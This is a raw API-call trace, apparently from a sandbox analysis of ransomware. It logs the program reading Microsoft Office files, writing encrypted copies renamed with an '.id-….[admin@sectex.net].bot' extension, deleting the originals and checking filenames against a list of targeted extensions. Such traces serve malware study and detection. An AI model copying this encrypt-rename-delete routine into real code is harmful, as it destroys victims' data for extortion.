	[0156.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.640] lstrlenW (lpString=".jpg") returned 4
	[0156.640] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.640] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.640] lstrlenW (lpString="MSART9.BDR") returned 10
	[0156.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.640] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=50838) returned 1
	[0156.640] CloseHandle (hObject=0x3d4) returned 1
	[0156.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr")) returned 0x20
	[0156.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.641] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.641] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.642] GetLastError () returned 0x0
	[0156.642] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xc696, lpOverlapped=0x0) returned 1
	[0156.644] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xc6a0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xc6a0, lpOverlapped=0x0) returned 1
	[0156.646] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.646] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.646] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.646] CloseHandle (hObject=0x3b0) returned 1
	[0156.646] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.646] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.649] CloseHandle (hObject=0x3d4) returned 1
	[0156.649] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart9.bdr")) returned 1
	[0156.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.651] lstrlenW (lpString=".doc") returned 4
	[0156.651] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString=".docx") returned 5
	[0156.651] lstrcmpiW (lpString1=".docx", lpString2="9.BDR") returned -1
	[0156.651] lstrlenW (lpString=".pdf") returned 4
	[0156.651] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString=".xls") returned 4
	[0156.651] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString=".xlsx") returned 5
	[0156.651] lstrcmpiW (lpString1=".xlsx", lpString2="9.BDR") returned -1
	[0156.651] lstrlenW (lpString=".ppt") returned 4
	[0156.651] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.651] lstrlenW (lpString=".zip") returned 4
	[0156.651] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString=".rar") returned 4
	[0156.651] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString=".bz2") returned 4
	[0156.651] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.651] lstrlenW (lpString=".7z") returned 3
	[0156.651] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.651] lstrlenW (lpString=".dbf") returned 4
	[0156.652] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.652] lstrlenW (lpString=".1cd") returned 4
	[0156.652] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.652] lstrlenW (lpString=".jpg") returned 4
	[0156.652] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.652] lstrlenW (lpString=".doc") returned 4
	[0156.652] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString=".docx") returned 5
	[0156.652] lstrcmpiW (lpString1=".docx", lpString2="9.BDR") returned -1
	[0156.652] lstrlenW (lpString=".pdf") returned 4
	[0156.652] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString=".xls") returned 4
	[0156.652] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString=".xlsx") returned 5
	[0156.652] lstrcmpiW (lpString1=".xlsx", lpString2="9.BDR") returned -1
	[0156.652] lstrlenW (lpString=".ppt") returned 4
	[0156.652] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.652] lstrlenW (lpString=".zip") returned 4
	[0156.652] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString=".rar") returned 4
	[0156.652] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString=".bz2") returned 4
	[0156.652] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.652] lstrlenW (lpString=".7z") returned 3
	[0156.652] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.653] lstrlenW (lpString=".dbf") returned 4
	[0156.653] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.653] lstrlenW (lpString=".1cd") returned 4
	[0156.653] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART9.BDR") returned 61
	[0156.653] lstrlenW (lpString=".jpg") returned 4
	[0156.653] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.653] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.653] lstrlenW (lpString="BRTVIEW.DLL") returned 11
	[0156.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\brtview.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.653] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=186776) returned 1
	[0156.654] CloseHandle (hObject=0x3d4) returned 1
	[0156.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\brtview.dll")) returned 0x20
	[0156.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\brtview.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\brtview.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.654] lstrlenW (lpString=".doc") returned 4
	[0156.654] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.654] lstrlenW (lpString=".docx") returned 5
	[0156.654] lstrcmpiW (lpString1=".docx", lpString2="W.DLL") returned -1
	[0156.654] lstrlenW (lpString=".pdf") returned 4
	[0156.654] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.654] lstrlenW (lpString=".xls") returned 4
	[0156.654] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.654] lstrlenW (lpString=".xlsx") returned 5
	[0156.654] lstrcmpiW (lpString1=".xlsx", lpString2="W.DLL") returned -1
	[0156.654] lstrlenW (lpString=".ppt") returned 4
	[0156.654] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.654] lstrlenW (lpString=".zip") returned 4
	[0156.654] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString=".rar") returned 4
	[0156.655] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString=".bz2") returned 4
	[0156.655] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.655] lstrlenW (lpString=".7z") returned 3
	[0156.655] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.655] lstrlenW (lpString=".dbf") returned 4
	[0156.655] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.655] lstrlenW (lpString=".1cd") returned 4
	[0156.655] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.655] lstrlenW (lpString=".jpg") returned 4
	[0156.655] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.655] lstrlenW (lpString=".doc") returned 4
	[0156.655] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString=".docx") returned 5
	[0156.655] lstrcmpiW (lpString1=".docx", lpString2="W.DLL") returned -1
	[0156.655] lstrlenW (lpString=".pdf") returned 4
	[0156.655] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString=".xls") returned 4
	[0156.655] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString=".xlsx") returned 5
	[0156.655] lstrcmpiW (lpString1=".xlsx", lpString2="W.DLL") returned -1
	[0156.655] lstrlenW (lpString=".ppt") returned 4
	[0156.655] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.655] lstrlenW (lpString=".zip") returned 4
	[0156.656] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.656] lstrlenW (lpString=".rar") returned 4
	[0156.656] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.656] lstrlenW (lpString=".bz2") returned 4
	[0156.656] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.656] lstrlenW (lpString=".7z") returned 3
	[0156.656] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.656] lstrlenW (lpString=".dbf") returned 4
	[0156.656] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.656] lstrlenW (lpString=".1cd") returned 4
	[0156.656] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BRTVIEW.DLL") returned 54
	[0156.656] lstrlenW (lpString=".jpg") returned 4
	[0156.656] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.656] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.656] lstrlenW (lpString="BSTORM.DLL") returned 10
	[0156.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\bstorm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.657] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=947072) returned 1
	[0156.657] CloseHandle (hObject=0x3d4) returned 1
	[0156.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\bstorm.dll")) returned 0x20
	[0156.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bstorm.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\bstorm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.658] lstrlenW (lpString=".doc") returned 4
	[0156.658] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.658] lstrlenW (lpString=".docx") returned 5
	[0156.658] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0156.658] lstrlenW (lpString=".pdf") returned 4
	[0156.658] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.658] lstrlenW (lpString=".xls") returned 4
	[0156.658] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.658] lstrlenW (lpString=".xlsx") returned 5
	[0156.658] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0156.658] lstrlenW (lpString=".ppt") returned 4
	[0156.658] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.658] lstrlenW (lpString=".zip") returned 4
	[0156.658] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.658] lstrlenW (lpString=".rar") returned 4
	[0156.658] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.658] lstrlenW (lpString=".bz2") returned 4
	[0156.658] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.658] lstrlenW (lpString=".7z") returned 3
	[0156.658] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.659] lstrlenW (lpString=".dbf") returned 4
	[0156.659] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.659] lstrlenW (lpString=".1cd") returned 4
	[0156.659] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.659] lstrlenW (lpString=".jpg") returned 4
	[0156.659] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.659] lstrlenW (lpString=".doc") returned 4
	[0156.659] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString=".docx") returned 5
	[0156.659] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0156.659] lstrlenW (lpString=".pdf") returned 4
	[0156.659] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString=".xls") returned 4
	[0156.659] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString=".xlsx") returned 5
	[0156.659] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0156.659] lstrlenW (lpString=".ppt") returned 4
	[0156.659] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.659] lstrlenW (lpString=".zip") returned 4
	[0156.659] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString=".rar") returned 4
	[0156.659] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.659] lstrlenW (lpString=".bz2") returned 4
	[0156.659] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.659] lstrlenW (lpString=".7z") returned 3
	[0156.659] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.660] lstrlenW (lpString=".dbf") returned 4
	[0156.660] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.660] lstrlenW (lpString=".1cd") returned 4
	[0156.660] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BSTORM.DLL") returned 53
	[0156.660] lstrlenW (lpString=".jpg") returned 4
	[0156.660] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.660] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.660] lstrlenW (lpString="CDLMSO.DLL") returned 10
	[0156.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\cdlmso.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.661] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=531800) returned 1
	[0156.661] CloseHandle (hObject=0x3b0) returned 1
	[0156.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\cdlmso.dll")) returned 0x20
	[0156.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\cdlmso.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\cdlmso.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.662] lstrlenW (lpString=".doc") returned 4
	[0156.662] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.662] lstrlenW (lpString=".docx") returned 5
	[0156.662] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1
	[0156.662] lstrlenW (lpString=".pdf") returned 4
	[0156.662] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.662] lstrlenW (lpString=".xls") returned 4
	[0156.662] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.662] lstrlenW (lpString=".xlsx") returned 5
	[0156.662] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1
	[0156.662] lstrlenW (lpString=".ppt") returned 4
	[0156.662] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.662] lstrlenW (lpString=".zip") returned 4
	[0156.663] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString=".rar") returned 4
	[0156.663] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString=".bz2") returned 4
	[0156.663] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.663] lstrlenW (lpString=".7z") returned 3
	[0156.663] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.663] lstrlenW (lpString=".dbf") returned 4
	[0156.663] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.663] lstrlenW (lpString=".1cd") returned 4
	[0156.663] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.663] lstrlenW (lpString=".jpg") returned 4
	[0156.663] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.663] lstrlenW (lpString=".doc") returned 4
	[0156.663] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString=".docx") returned 5
	[0156.663] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1
	[0156.663] lstrlenW (lpString=".pdf") returned 4
	[0156.663] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString=".xls") returned 4
	[0156.663] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString=".xlsx") returned 5
	[0156.663] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1
	[0156.663] lstrlenW (lpString=".ppt") returned 4
	[0156.663] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.664] lstrlenW (lpString=".zip") returned 4
	[0156.664] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.664] lstrlenW (lpString=".rar") returned 4
	[0156.664] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.664] lstrlenW (lpString=".bz2") returned 4
	[0156.664] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.664] lstrlenW (lpString=".7z") returned 3
	[0156.664] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.664] lstrlenW (lpString=".dbf") returned 4
	[0156.664] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.664] lstrlenW (lpString=".1cd") returned 4
	[0156.664] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CDLMSO.DLL") returned 53
	[0156.664] lstrlenW (lpString=".jpg") returned 4
	[0156.664] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.664] lstrcmpiW (lpString1=".HLP", lpString2=".bot") returned 1
	[0156.664] lstrlenW (lpString="CGMIMP32.HLP") returned 12
